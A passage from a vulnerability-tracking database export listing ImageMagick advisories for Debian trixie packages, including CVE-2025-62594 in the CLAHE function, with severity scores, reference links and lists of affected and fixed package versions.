vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-11310

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vguv-n176-k3ch

url VCID-vkp6-wh22-eqap

vulnerability_id VCID-vkp6-wh22-eqap

summary

ImageMagick CLAHE : Unsigned underflow and division-by-zero lead to OOB pointer arithmetic and process crash (DoS)
A single root cause in the CLAHE implementation — tile width/height becoming zero — produces two distinct but related unsafe behaviors.
Vulnerabilities exists in the `CLAHEImage()` function of ImageMagick’s `MagickCore/enhance.c`.

1. Unsigned integer underflow → out-of-bounds pointer arithmetic (OOB): when `tile_info.height == 0`, the expression `tile_info.height - 1` (unsigned) wraps to a very large value; using that value in pointer arithmetic yields a huge offset and OOB memory access (leading to memory corruption, SIGSEGV, or resource exhaustion).
2. **Division/modulus by zero**: where code performs `... / tile_info.width` or `... % tile_info.height` without re-checking for zero, causing immediate division-by-zero crashes under sanitizers or `abort` at runtime.

Both behaviors are triggered by the same invalid tile condition (e.g., CLI exact `-clahe 0x0!` or automatic tile derivation `dim >> 3 == 0` for very small images).

---

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json

reference_id

reference_type

scores

value	4.7
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-62594

reference_id

reference_type

scores

value	0.00014
scoring_system	epss
scoring_elements	0.02624
published_at	2026-04-04T12:55:00Z

value	0.00014
scoring_system	epss
scoring_elements	0.0261
published_at	2026-04-02T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04036
published_at	2026-04-21T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03915
published_at	2026-04-18T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03903
published_at	2026-04-16T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.0392
published_at	2026-04-13T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.0395
published_at	2026-04-12T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03968
published_at	2026-04-07T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04054
published_at	2026-04-26T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04046
published_at	2026-04-24T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03967
published_at	2026-04-11T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03998
published_at	2026-04-09T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03973
published_at	2026-04-08T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-62594

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	4.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129

reference_id

reference_type

scores

value	4.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/

url

https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296
reference_id	1119296
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2406644
reference_id	2406644
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2406644

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-62594

reference_id

CVE-2025-62594

reference_type

scores

value	4.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-62594

reference_url

https://github.com/advisories/GHSA-wpp4-vqfq-v4hp

reference_id

GHSA-wpp4-vqfq-v4hp

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-wpp4-vqfq-v4hp

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp

reference_id

GHSA-wpp4-vqfq-v4hp

reference_type

scores

value	4.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u4?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.8%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.8%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.8%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2025-62594, GHSA-wpp4-vqfq-v4hp

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vkp6-wh22-eqap

url VCID-w8gb-1r6a-xud3

vulnerability_id VCID-w8gb-1r6a-xud3

summary ImageMagick: heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13299.json

reference_id

reference_type

scores

value	5.4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13299.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13299

reference_id

reference_type

scores

value	0.0048
scoring_system	epss
scoring_elements	0.65148
published_at	2026-04-26T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65118
published_at	2026-04-21T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65134
published_at	2026-04-24T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65523
published_at	2026-04-02T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65517
published_at	2026-04-07T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.6557
published_at	2026-04-08T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65581
published_at	2026-04-09T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.656
published_at	2026-04-11T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65587
published_at	2026-04-12T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65559
published_at	2026-04-13T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65595
published_at	2026-04-16T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65608
published_at	2026-04-18T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65475
published_at	2026-04-01T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65551
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13299

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.1
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1730583
reference_id	1730583
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1730583

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13299

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w8gb-1r6a-xud3

url VCID-w9dc-fbc3-mudv

vulnerability_id VCID-w9dc-fbc3-mudv

summary ImageMagick: Assertion failure in SetPixelChannelAttributes

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-9499.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-9499.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-9499

reference_id

reference_type

scores

value	0.00318
scoring_system	epss
scoring_elements	0.54764
published_at	2026-04-01T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.5486
published_at	2026-04-26T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54865
published_at	2026-04-21T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.5484
published_at	2026-04-24T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54835
published_at	2026-04-02T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54859
published_at	2026-04-04T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54828
published_at	2026-04-07T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54878
published_at	2026-04-08T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54875
published_at	2026-04-09T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54887
published_at	2026-04-11T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54869
published_at	2026-04-12T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54846
published_at	2026-04-13T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54884
published_at	2026-04-16T12:55:00Z

value	0.00318
scoring_system	epss
scoring_elements	0.54886
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-9499

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	4.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1461890
reference_id	1461890
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1461890

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

